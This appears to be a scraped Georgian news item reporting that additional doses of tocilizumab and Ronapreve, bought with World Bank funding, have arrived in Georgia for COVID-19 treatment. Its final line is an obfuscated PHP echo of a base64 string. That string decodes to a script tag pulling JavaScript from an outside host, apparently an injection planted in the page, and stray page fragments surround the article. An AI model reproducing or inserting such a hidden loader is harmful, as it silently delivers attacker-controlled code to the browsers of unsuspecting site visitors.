celsiusi
ავერსი შნაიდერი
საქართველოში კორონავირუსის სამკურნალო მედიკამენტების დამატებითი დოზები ჩამოვიდა.
 
2000 დოზა “ტოცილიზუმაბი” და 500 დოზა “რონაპრივი” სამედიცინო დაწესებულებებში ეტაპობრივად განაწილდება.
 
ჯანდაცვის სამინისტროს ინფორმაციით, მედიკამენტების შესყიდვა ჯანდაცვის სამინისტროს მიერ, მსოფლიო ბანკის „Covid-19-ის წინააღმდეგ სწრაფი რეაგირების პროექტის“ დამატებითი დაფინასების ფარგლებში განხორციელდა.
 
“Hetero Biopharma Limited”-ი ერთ-ერთი წამყვანი ინდური ფარმაცევტული კომპანიაა, რომელმაც ტოცილიზუმაბის გადაუდებელი გამოყენების ავტორიზაცია მიმდინარე წლის სექტემბრის ბოლოს მიიღო. “ტოცილიზუმაბი” აქტიურად გამოიყენება COVID-19-ით ინფიცირებული მძიმე და კრიტიკულად მძიმე პაციენტების სამკურნალოდ“,- აღნიშნავენ უწყებაში.
 
შეგახსენებთ, “Roche”-ს მონოკლონური ანტისხეულები სამინისტრომ პირველად დონაციის სახით გერმანიის მთავრობისგან მიიღო. “Roche”-ს მონოკლონურ ანტისხეულებს კი (კასირივიმაბი/იმდევიმაბი) COVID-19-ით ინფიცირებული პაციენტების სამკურნალოდ, აშშ-ის საკვებისა და მედიკამენტების სააგენტოს (FDA) გადაუდებელი გამოყენების ავტორიზაცია აქვს მიღებული.
891
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");